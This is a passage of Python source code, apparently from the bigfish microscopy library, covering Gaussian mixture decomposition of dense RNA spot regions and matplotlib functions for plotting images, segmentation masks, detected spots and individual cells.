coord = np.array(coord_gaussian, dtype=np.float64)
coord[:, 0] = (coord[:, 0] / voxel_size_yx) + min_y
coord[:, 1] = (coord[:, 1] / voxel_size_yx) + min_x
spots_in_region = np.zeros((coord.shape[0], 3), dtype=np.int64)
spots_in_region[:, :2] = coord
spots_in_region[:, 2] = i_region
spots_in_regions.append(spots_in_region)
region_y, region_x = tuple(coord[0])
nb_rna_region = coord.shape[0]
region_area = region.area
region_intensity = region.mean_intensity
regions.append([region_y, region_x, nb_rna_region,
region_area, region_intensity, i_region])
spots_in_regions = np.concatenate(spots_in_regions, axis=0)
regions = np.array(regions, dtype=np.int64)
return spots_in_regions, regions
def _gaussian_mixture_3d(image, region, voxel_size_z, voxel_size_yx, sigma_z,
sigma_yx, amplitude, background, precomputed_gaussian,
limit_gaussian=1000):
"""Fit as many 3-d gaussians as possible in a candidate region.
Parameters
----------
image : np.ndarray, np.uint
A 3-d image with detected spot and shape (z, y, x).
region : skimage.measure._regionprops._RegionProperties
Properties of a candidate region.
voxel_size_z : int or float
Height of a voxel, along the z axis, in nanometer.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
sigma_z : int or float
Standard deviation of the gaussian along the z axis, in pixel.
sigma_yx : int or float
Standard deviation of the gaussian along the yx axis, in pixel.
amplitude : float
Amplitude of the gaussian.
background : float
Background minimum value of the image.
precomputed_gaussian : Tuple[np.ndarray]
Tuple with one tables of precomputed values for the erf, with shape
(nb_value, 2). One table per dimension.
limit_gaussian : int
Limit number of gaussian to fit into this region.
Returns
-------
image_region : np.ndarray, np.uint
A 3-d image with detected spots and shape (z, y, x).
best_simulation : np.ndarray, np.uint
A 3-d image with simulated spots and shape (z, y, x).
positions_gaussian : List[List]
List of positions (as a list [z, y, x]) for the different gaussian
simulations used in the mixture.
"""
# get an image of the region
box = tuple(region.bbox)
image_region = image[box[0]:box[3], box[1]:box[4], box[2]:box[5]]
image_region_raw = np.reshape(image_region, image_region.size)
image_region_raw = image_region_raw.astype(np.float64)
# build a grid to represent this image
grid = _initialize_grid_3d(image_region, voxel_size_z, voxel_size_yx)
# add a gaussian for each local maximum while the RSS decreases
simulation = np.zeros_like(image_region_raw)
residual = image_region_raw - simulation
ssr = np.sum(residual ** 2)
diff_ssr = -1
nb_gaussian = 0
best_simulation = simulation.copy()
positions_gaussian = []
while diff_ssr < 0 or nb_gaussian == limit_gaussian:
position_gaussian = np.argmax(residual)
positions_gaussian.append(list(grid[:, position_gaussian]))
simulation += gaussian_3d(grid=grid,
mu_z=float(positions_gaussian[-1][0]),
mu_y=float(positions_gaussian[-1][1]),
mu_x=float(positions_gaussian[-1][2]),
sigma_z=sigma_z,
sigma_yx=sigma_yx,
voxel_size_z=voxel_size_z,
voxel_size_yx=voxel_size_yx,
psf_amplitude=amplitude,
psf_background=background,
precomputed=precomputed_gaussian)
residual = image_region_raw - simulation
new_ssr = np.sum(residual ** 2)
diff_ssr = new_ssr - ssr
ssr = new_ssr
nb_gaussian += 1
background = 0
if diff_ssr < 0:
best_simulation = simulation.copy()
if 1 < nb_gaussian < limit_gaussian:
positions_gaussian.pop(-1)
elif nb_gaussian == limit_gaussian:
warnings.warn("Problem occurs during the decomposition of a dense "
"region. More than {0} spots seem to be necessary to "
"reproduce the candidate region and decomposition was "
"stopped early. Set a higher limit or check a potential "
"artifact in the image if you do not expect such a "
"large region to be decomposed.".format(limit_gaussian),
UserWarning)
best_simulation = np.reshape(best_simulation, image_region.shape)
max_value_dtype = np.iinfo(image_region.dtype).max
best_simulation = np.clip(best_simulation, 0, max_value_dtype)
best_simulation = best_simulation.astype(image_region.dtype)
return image_region, best_simulation, positions_gaussian
def _gaussian_mixture_2d(image, region, voxel_size_yx, sigma_yx, amplitude,
background, precomputed_gaussian,
limit_gaussian=1000):
"""Fit as many 2-d gaussians as possible in a candidate region.
Parameters
----------
image : np.ndarray, np.uint
A 2-d image with detected spot and shape (y, x).
region : skimage.measure._regionprops._RegionProperties
Properties of a candidate region.
voxel_size_yx : int or float
Size of a voxel on the yx plan, in nanometer.
sigma_yx : int or float
Standard deviation of the gaussian along the yx axis, in pixel.
amplitude : float
Amplitude of the gaussian.
background : float
Background minimum value of the image.
precomputed_gaussian : Tuple[np.ndarray]
Tuple with one tables of precomputed values for the erf, with shape
(nb_value, 2). One table per dimension.
limit_gaussian : int
Limit number of gaussian to fit into this region.
Returns
-------
image_region : np.ndarray, np.uint
A 2-d image with detected spots and shape (y, x).
best_simulation : np.ndarray, np.uint
A 2-d image with simulated spots and shape (y, x).
positions_gaussian : List[List]
List of positions (as a list [y, x]) for the different gaussian
simulations used in the mixture.
"""
# get an image of the region
box = tuple(region.bbox)
image_region = image[box[0]:box[2], box[1]:box[3]]
image_region_raw = np.reshape(image_region, image_region.size)
image_region_raw = image_region_raw.astype(np.float64)
# build a grid to represent this image
grid = _initialize_grid_2d(image_region, voxel_size_yx)
# add a gaussian for each local maximum while the RSS decreases
simulation = np.zeros_like(image_region_raw)
residual = image_region_raw - simulation
ssr = np.sum(residual ** 2)
diff_ssr = -1
nb_gaussian = 0
best_simulation = simulation.copy()
positions_gaussian = []
while diff_ssr < 0 or nb_gaussian == limit_gaussian:
position_gaussian = np.argmax(residual)
positions_gaussian.append(list(grid[:, position_gaussian]))
simulation += gaussian_2d(grid=grid,
mu_y=float(positions_gaussian[-1][0]),
mu_x=float(positions_gaussian[-1][1]),
sigma_yx=sigma_yx,
voxel_size_yx=voxel_size_yx,
psf_amplitude=amplitude,
psf_background=background,
precomputed=precomputed_gaussian)
residual = image_region_raw - simulation
new_ssr = np.sum(residual ** 2)
diff_ssr = new_ssr - ssr
ssr = new_ssr
nb_gaussian += 1
background = 0
if diff_ssr < 0:
best_simulation = simulation.copy()
if 1 < nb_gaussian < limit_gaussian:
positions_gaussian.pop(-1)
elif nb_gaussian == limit_gaussian:
warnings.warn("Problem occurs during the decomposition of a dense "
"region. More than {0} spots seem to be necessary to "
"reproduce the candidate region and decomposition was "
"stopped early. Set a higher limit or check a potential "
"artifact in the image if you do not expect such a "
"large region to be decomposed.".format(limit_gaussian),
UserWarning)
best_simulation = np.reshape(best_simulation, image_region.shape)
max_value_dtype = np.iinfo(image_region.dtype).max
best_simulation = np.clip(best_simulation, 0, max_value_dtype)
best_simulation = best_simulation.astype(image_region.dtype)
return image_region, best_simulation, positions_gaussian
```
#### File: bigfish/plot/plot_images.py
```python
import warnings
import bigfish.stack as stack
from .utils import save_plot, get_minmax_values, create_colormap
import matplotlib.pyplot as plt
import numpy as np
from skimage.segmentation import find_boundaries
from matplotlib.colors import ListedColormap
from matplotlib.patches import RegularPolygon
# ### General plot ###
def plot_yx(image, r=0, c=0, z=0, rescale=False, contrast=False,
title=None, framesize=(8, 8), remove_frame=True, path_output=None,
ext="png", show=True):
"""Plot the selected yx plan of the selected dimensions of an image.
Parameters
----------
image : np.ndarray
A 2-d, 3-d, 4-d or 5-d image with shape (y, x), (z, y, x),
(c, z, y, x) or (r, c, z, y, x) respectively.
r : int
Index of the round to keep.
c : int
Index of the channel to keep.
z : int
Index of the z slice to keep.
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=[2, 3, 4, 5],
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
stack.check_parameter(r=int, c=int, z=int,
rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
# get the 2-d image
if image.ndim == 2:
xy_image = image
elif image.ndim == 3:
xy_image = image[z, :, :]
elif image.ndim == 4:
xy_image = image[c, z, :, :]
else:
xy_image = image[r, c, z, :, :]
# plot
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
plt.imshow(xy_image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
plt.imshow(xy_image)
else:
if xy_image.dtype not in [np.int64, bool]:
xy_image = stack.rescale(xy_image, channel_to_stretch=0)
plt.imshow(xy_image)
if title is not None and not remove_frame:
plt.title(title, fontweight="bold", fontsize=25)
if not remove_frame:
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
def plot_images(images, rescale=False, contrast=False, titles=None,
framesize=(15, 10), remove_frame=True, path_output=None,
ext="png", show=True):
"""Plot or subplot of 2-d images.
Parameters
----------
images : np.ndarray or List[np.ndarray]
Images with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
titles : List[str]
Titles of the subplots.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# enlist image if necessary
if isinstance(images, np.ndarray):
images = [images]
# check parameters
stack.check_parameter(images=list,
rescale=bool,
contrast=bool,
titles=(str, list, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
for image in images:
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
# we plot 3 images by row maximum
nrow = int(np.ceil(len(images)/3))
ncol = min(len(images), 3)
# plot one image
if len(images) == 1:
if titles is not None:
title = titles[0]
else:
title = None
plot_yx(images[0],
rescale=rescale,
contrast=contrast,
title=title,
framesize=framesize,
remove_frame=remove_frame,
path_output=path_output,
ext=ext,
show=show)
return
# plot multiple images
fig, ax = plt.subplots(nrow, ncol, figsize=framesize)
# one row
if len(images) in [2, 3]:
for i, image in enumerate(images):
if remove_frame:
ax[i].axis("off")
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[i].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[i].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[i].imshow(image)
if titles is not None:
ax[i].set_title(titles[i], fontweight="bold", fontsize=10)
# several rows
else:
# we complete the row with empty frames
r = nrow * 3 - len(images)
images_completed = [image for image in images] + [None] * r
for i, image in enumerate(images_completed):
row = i // 3
col = i % 3
if image is None:
ax[row, col].set_visible(False)
continue
if remove_frame:
ax[row, col].axis("off")
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[row, col].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[row, col].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[row, col].imshow(image)
if titles is not None:
ax[row, col].set_title(titles[i],
fontweight="bold", fontsize=10)
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# ### Segmentation plot ###
def plot_segmentation(image, mask, rescale=False, contrast=False, title=None,
framesize=(15, 10), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot result of a 2-d segmentation, with labelled instances if available.
Parameters
----------
image : np.ndarray
A 2-d image with shape (y, x).
mask : np.ndarray
A 2-d image with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
stack.check_array(mask,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list))
# plot
fig, ax = plt.subplots(1, 3, sharex='col', figsize=framesize)
# image
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
if title is not None:
ax[0].set_title(title, fontweight="bold", fontsize=10)
if remove_frame:
ax[0].axis("off")
# label
ax[1].imshow(mask)
if title is not None:
ax[1].set_title("Segmentation", fontweight="bold", fontsize=10)
if remove_frame:
ax[1].axis("off")
# superposition
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[2].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[2].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[2].imshow(image)
masked = np.ma.masked_where(mask == 0, mask)
ax[2].imshow(masked, cmap=ListedColormap(['red']), alpha=0.5)
if title is not None:
ax[2].set_title("Surface", fontweight="bold", fontsize=10)
if remove_frame:
ax[2].axis("off")
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
def plot_segmentation_boundary(image, cell_label=None, nuc_label=None,
rescale=False, contrast=False, title=None,
framesize=(10, 10), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot the boundary of the segmented objects.
Parameters
----------
image : np.ndarray
A 2-d image with shape (y, x).
cell_label : np.ndarray
A 2-d image with shape (y, x).
nuc_label : np.ndarray
A 2-d image with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
if cell_label is not None:
stack.check_array(cell_label,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
if nuc_label is not None:
stack.check_array(nuc_label,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
# get boundaries
cell_boundaries = None
nuc_boundaries = None
if cell_label is not None:
cell_boundaries = find_boundaries(cell_label, mode='thick')
cell_boundaries = np.ma.masked_where(cell_boundaries == 0,
cell_boundaries)
if nuc_label is not None:
nuc_boundaries = find_boundaries(nuc_label, mode='thick')
nuc_boundaries = np.ma.masked_where(nuc_boundaries == 0,
nuc_boundaries)
# plot
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
plt.imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
plt.imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
plt.imshow(image)
if cell_label is not None:
plt.imshow(cell_boundaries, cmap=ListedColormap(['red']))
if nuc_label is not None:
plt.imshow(nuc_boundaries, cmap=ListedColormap(['blue']))
if title is not None and not remove_frame:
plt.title(title, fontweight="bold", fontsize=25)
if not remove_frame:
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
def plot_segmentation_diff(image, mask_pred, mask_gt, rescale=False,
contrast=False, title=None, framesize=(15, 10),
remove_frame=True, path_output=None, ext="png",
show=True):
"""Plot segmentation results along with ground truth to compare.
Parameters
----------
image : np.ndarray, np.uint, np.int, np.float or bool
Image with shape (y, x).
mask_pred : np.ndarray, np.uint, np.int or np.float
Image with shape (y, x).
mask_gt : np.ndarray, np.uint, np.int or np.float
Image with shape (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str or None
Title of the plot.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str or None
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64,
bool])
stack.check_array(mask_pred,
ndim=2,
dtype=[np.uint8, np.uint16, np.int32, np.int64,
np.float32, np.float64,
bool])
stack.check_array(mask_gt,
ndim=2,
dtype=[np.uint8, np.uint16, np.int32, np.int64,
np.float32, np.float64,
bool])
# plot multiple images
fig, ax = plt.subplots(1, 3, figsize=framesize)
# image
if remove_frame:
ax[0].axis("off")
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
if title is None:
ax[0].set_title("", fontweight="bold", fontsize=10)
else:
ax[0].set_title(title, fontweight="bold", fontsize=10)
# build colormap
cmap = create_colormap()
# prediction
im_mask_pred = np.ma.masked_where(mask_pred == 0, mask_pred)
if remove_frame:
ax[1].axis("off")
ax[1].imshow(im_mask_pred, cmap=cmap)
ax[1].set_title("Prediction", fontweight="bold", fontsize=10)
# ground truth
im_mask_gt = np.ma.masked_where(mask_gt == 0, mask_gt)
if remove_frame:
ax[2].axis("off")
ax[2].imshow(im_mask_gt, cmap=cmap)
ax[2].set_title("Ground truth", fontweight="bold", fontsize=10)
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# ### Detection plot ###
# TODO allow textual annotations
def plot_detection(image, spots, shape="circle", radius=3, color="red",
linewidth=1, fill=False, rescale=False, contrast=False,
title=None, framesize=(15, 10), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot detected spots and foci on a 2-d image.
Parameters
----------
image : np.ndarray
A 2-d image with shape (y, x).
spots : List[np.ndarray] or np.ndarray
Array with coordinates and shape (nb_spots, 3) or (nb_spots, 2). To
plot different kind of detected spots with different symbols, use a
list of arrays.
shape : List[str] or str
List of symbols used to localized the detected spots in the image,
among `circle`, `square` or `polygon`. One symbol per array in `spots`.
If `shape` is a string, the same symbol is used for every elements of
'spots'.
radius : List[int or float] or int or float
List of yx radii of the detected spots. One radius per array in
`spots`. If `radius` is a scalar, the same value is applied for every
elements of `spots`.
color : List[str] or str
List of colors of the detected spots. One color per array in `spots`.
If `color` is a string, the same color is applied for every elements
of `spots`.
linewidth : List[int] or int
List of widths or width of the border symbol. One integer per array
in `spots`. If `linewidth` is an integer, the same width is applied
for every elements of `spots`.
fill : List[bool] or bool
List of boolean to fill the symbol the detected spots.
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(image,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64])
stack.check_parameter(spots=(list, np.ndarray),
shape=(list, str),
radius=(list, int, float),
color=(list, str),
linewidth=(list, int),
fill=(list, bool),
rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
if isinstance(spots, list):
for spots_ in spots:
stack.check_array(spots_, ndim=2, dtype=[np.int64, np.float64])
else:
stack.check_array(spots, ndim=2, dtype=[np.int64, np.float64])
# enlist and format parameters
if not isinstance(spots, list):
spots = [spots]
n = len(spots)
if not isinstance(shape, list):
shape = [shape] * n
elif isinstance(shape, list) and len(shape) != n:
raise ValueError("If 'shape' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(radius, list):
radius = [radius] * n
elif isinstance(radius, list) and len(radius) != n:
raise ValueError("If 'radius' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(color, list):
color = [color] * n
elif isinstance(color, list) and len(color) != n:
raise ValueError("If 'color' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(linewidth, list):
linewidth = [linewidth] * n
elif isinstance(linewidth, list) and len(linewidth) != n:
raise ValueError("If 'linewidth' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
if not isinstance(fill, list):
fill = [fill] * n
elif isinstance(fill, list) and len(fill) != n:
raise ValueError("If 'fill' is a list, it should have the same "
"number of items than spots ({0}).".format(n))
# plot
fig, ax = plt.subplots(1, 2, sharex='col', figsize=framesize)
# image
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
# spots
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[1].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[1].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[1].imshow(image)
for i, coordinates in enumerate(spots):
# get 2-d coordinates
if coordinates.shape[1] == 3:
coordinates_2d = coordinates[:, 1:]
else:
coordinates_2d = coordinates
# plot symbols
for y, x in coordinates_2d:
x = _define_patch(x, y, shape[i], radius[i], color[i],
linewidth[i], fill[i])
ax[1].add_patch(x)
# titles and frames
if title is not None:
ax[0].set_title(title, fontweight="bold", fontsize=10)
ax[1].set_title("Detection results", fontweight="bold", fontsize=10)
if remove_frame:
ax[0].axis("off")
ax[1].axis("off")
plt.tight_layout()
# output
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
def _define_patch(x, y, shape, radius, color, linewidth, fill):
"""Define a matplotlib.patches to plot.
Parameters
----------
x : int or float
Coordinate x for the patch center.
y : int or float
Coordinate y for the patch center.
shape : str
Shape of the patch to define (among `circle`, `square` or `polygon`)
radius : int or float
Radius of the patch.
color : str
Color of the patch.
linewidth : int
Width of the patch border.
fill : bool
Make the patch shape empty or not.
Returns
-------
x : matplotlib.patches object
Geometric form to add to a plot.
"""
# circle
if shape == "circle":
x = plt.Circle((x, y), radius,
color=color,
linewidth=linewidth,
fill=fill)
# square
elif shape == "square":
x = plt.Rectangle((x, y), radius, radius,
color=color,
linewidth=linewidth,
fill=fill)
# polygon
elif shape == "polygon":
x = RegularPolygon((x, y), 5, radius,
color=color,
linewidth=linewidth,
fill=fill)
else:
warnings.warn("shape should take a value among 'circle', 'square' or "
"'polygon', but not {0}".format(shape), UserWarning)
return x
def plot_reference_spot(reference_spot, rescale=False, contrast=False,
title=None, framesize=(8, 8), remove_frame=True,
path_output=None, ext="png", show=True):
"""Plot the selected yx plan of the selected dimensions of an image.
Parameters
----------
reference_spot : np.ndarray
Spot image with shape (z, y, x) or (y, x).
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
title : str
Title of the image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
remove_frame : bool
Remove axes and frame.
path_output : str
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
# check parameters
stack.check_array(reference_spot,
ndim=[2, 3],
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64])
stack.check_parameter(rescale=bool,
contrast=bool,
title=(str, type(None)),
framesize=tuple,
remove_frame=bool,
path_output=(str, type(None)),
ext=(str, list),
show=bool)
# project spot in 2-d if necessary
if reference_spot.ndim == 3:
reference_spot = stack.maximum_projection(reference_spot)
# plot reference spot
if remove_frame:
fig = plt.figure(figsize=framesize, frameon=False)
ax = fig.add_axes([0, 0, 1, 1])
ax.axis('off')
else:
plt.figure(figsize=framesize)
if not rescale and not contrast:
vmin, vmax = get_minmax_values(reference_spot)
plt.imshow(reference_spot, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
plt.imshow(reference_spot)
else:
if reference_spot.dtype not in [np.int64, bool]:
reference_spot = stack.rescale(reference_spot, channel_to_stretch=0)
plt.imshow(reference_spot)
if title is not None and not remove_frame:
plt.title(title, fontweight="bold", fontsize=25)
if not remove_frame:
plt.tight_layout()
if path_output is not None:
save_plot(path_output, ext)
if show:
plt.show()
else:
plt.close()
# ### Individual cell plot ###
def plot_cell(ndim, cell_coord=None, nuc_coord=None, rna_coord=None,
foci_coord=None, other_coord=None, image=None, cell_mask=None,
nuc_mask=None, title=None, remove_frame=True, rescale=False,
contrast=False, framesize=(15, 10), path_output=None, ext="png",
show=True):
"""
Plot image and coordinates extracted for a specific cell.
Parameters
----------
ndim : int
Number of spatial dimensions to consider in the coordinates (2 or 3).
cell_coord : np.ndarray, np.int64
Coordinates of the cell border with shape (nb_points, 2). If None,
coordinate representation of the cell is not shown.
nuc_coord : np.ndarray, np.int64
Coordinates of the nucleus border with shape (nb_points, 2).
rna_coord : np.ndarray, np.int64
Coordinates of the detected spots with shape (nb_spots, 4) or
(nb_spots, 3). One coordinate per dimension (zyx or yx dimensions)
plus the index of the cluster assigned to the spot. If no cluster was
assigned, value is -1. If only coordinates of spatial dimensions are
available, only centroid of foci can be shown.
foci_coord : np.ndarray, np.int64
Array with shape (nb_foci, 5) or (nb_foci, 4). One coordinate per
dimension for the foci centroid (zyx or yx dimensions), the number of
spots detected in the foci and its index.
other_coord : np.ndarray, np.int64
Coordinates of the detected elements with shape (nb_elements, 3) or
(nb_elements, 2). One coordinate per dimension (zyx or yx dimensions).
image : np.ndarray, np.uint
Original image of the cell with shape (y, x). If None, original image
of the cell is not shown.
cell_mask : np.ndarray, np.uint
Mask of the cell.
nuc_mask : np.ndarray, np.uint
Mask of the nucleus.
title : str or None
Title of the image.
remove_frame : bool
Remove axes and frame.
rescale : bool
Rescale pixel values of the image (made by default in matplotlib).
contrast : bool
Contrast image.
framesize : tuple
Size of the frame used to plot with ``plt.figure(figsize=framesize)``.
path_output : str or None
Path to save the image (without extension).
ext : str or List[str]
Extension used to save the plot. If it is a list of strings, the plot
will be saved several times.
show : bool
Show the figure or not.
"""
if cell_coord is None and image is None:
return
# check parameters
if cell_coord is not None:
stack.check_array(cell_coord, ndim=2, dtype=np.int64)
if nuc_coord is not None:
stack.check_array(nuc_coord, ndim=2, dtype=np.int64)
if rna_coord is not None:
stack.check_array(rna_coord, ndim=2, dtype=np.int64)
if foci_coord is not None:
stack.check_array(foci_coord, ndim=2, dtype=np.int64)
if other_coord is not None:
stack.check_array(other_coord, ndim=2, dtype=np.int64)
if image is not None:
stack.check_array(image, ndim=2,
dtype=[np.uint8, np.uint16, np.int64,
np.float32, np.float64])
if cell_mask is not None:
stack.check_array(cell_mask,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
if nuc_mask is not None:
stack.check_array(nuc_mask,
ndim=2,
dtype=[np.uint8, np.uint16, np.int64, bool])
stack.check_parameter(ndim=int,
title=(str, type(None)),
remove_frame=bool,
rescale=bool,
contrast=bool,
framesize=tuple,
path_output=(str, type(None)),
ext=(str, list))
# plot original image and coordinate representation
if cell_coord is not None and image is not None:
fig, ax = plt.subplots(1, 2, figsize=framesize)
# original image
if not rescale and not contrast:
vmin, vmax = get_minmax_values(image)
ax[0].imshow(image, vmin=vmin, vmax=vmax)
elif rescale and not contrast:
ax[0].imshow(image)
else:
if image.dtype not in [np.int64, bool]:
image = stack.rescale(image, channel_to_stretch=0)
ax[0].imshow(image)
if cell_mask is not None:
cell_boundaries = stack.from_surface_to_boundaries(cell_mask)
cell_boundaries = np.ma.masked_where(cell_boundaries == 0,
cell_boundaries)
ax[0].imshow(cell_boundaries, cmap=ListedColormap(['red']))
if nuc_mask is not None:
nuc_boundaries = stack.from_surface_to_boundaries(nuc_mask)
nuc_boundaries = np.ma.masked_where(nuc_boundaries == 0,
nuc_boundaries)
ax[0].imshow(nuc_boundaries, cmap=ListedColormap(['blue']))
# coordinate image
ax[1].plot(cell_coord[:, 1], cell_coord[:, 0],
c="black", linewidth=2)
if nuc_coord is not None:
ax[1].plot(nuc_coord[:, 1], nuc_coord[:, 0],
c="steelblue", linewidth=2)
if rna_coord is not None:
ax[1].scatter(rna_coord[:, ndim - 1], rna_coord[:, ndim - 2],
s=25, c="firebrick", marker=".")
if foci_coord is not None:
for foci in foci_coord:
ax[1].text(foci[ndim-1] + 5, foci[ndim-2] - 5, str(foci[ndim]),
color="darkorange", size=20)
# case where we know which rna belong to a foci
if rna_coord.shape[1] == ndim + 1:
foci_indices = foci_coord[:, ndim + 1]
mask_rna_in_foci = np.isin(rna_coord[:, ndim], foci_indices)
rna_in_foci_coord = rna_coord[mask_rna_in_foci, :].copy()
ax[1].scatter(rna_in_foci_coord[:, ndim - 1],
